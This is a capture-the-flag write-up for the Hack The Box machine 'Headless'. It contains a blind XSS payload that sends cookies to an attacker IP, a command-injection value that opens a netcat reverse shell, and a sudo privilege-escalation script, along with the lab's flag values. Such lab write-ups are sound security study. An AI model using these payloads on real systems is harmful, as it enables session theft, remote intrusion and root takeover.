// htb writeup 2026-02-25
headless
HackTheBox Easy
← all boxes
root obtained // PWNED

Hack The Box - Headless (10.10.11.8)

🧠 Summary

Headless is an easy Linux machine hosted on Hack The Box. It demonstrates practical exploitation via:

🔍 Enumeration

🔹 Nmap

nmap -p- headless.htb --min-rate 5000
nmap -p 5000,22 -sC -sV headless.htb -oN nmap_alert

Findings:

🌐 Web Analysis

🚪 Gobuster Discovery

While testing XSS in the form, run Gobuster in background to enumerate paths:

gobuster dir -u http://headless.htb:5000 -w /usr/share/wordlists/dirb/big.txt

Discovery:

/dashboard            (Status: 500)

🧪 Blind XSS via User-Agent

Step 1: Test XSS

User-Agent: <script>alert(1)</script>

Step 2: Trigger data exfil

<script>
var ink=new Image(); 
ink.src="http://10.10.14.12:4444/?cookie="+btoa(document.cookie);
</script>

Step 3: Listener

nc -lvnp 4444

Output:

GET /?cookie=aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA=

Decode:

echo "aXNf..." | base64 -d
# is_admin=...

🔑 Cookie Theft & Dashboard Access

💥 Command Injection → Reverse Shell

Payload:

date=2023-09-15;nc 10.10.14.12 1334 -e /bin/bash

Listener:

nc -lvnp 1334

Stabilize shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
ctrl+Z
stty raw -echo; fg; reset

🏁 User Flag

cat /home/dvir/user.txt
98199ec69a2d999bffd3147052096f35

⬆️ Privilege Escalation

sudo -l Output:

(ALL) NOPASSWD: /usr/bin/syscheck

Read syscheck script:

cat /usr/bin/syscheck

Exploit via missing initdb.sh:

echo -e '#!/bin/bash\n/bin/bash' > /tmp/initdb.sh
chmod +x /tmp/initdb.sh
cd /tmp
sudo syscheck

Now root!

whoami
root
cat /root/root.txt
bd2d4eb12d06b81cc888cef32e370f68

🧠 Lessons Learned

Writeup by inksec

← all boxes 0x74617465.sh blue team →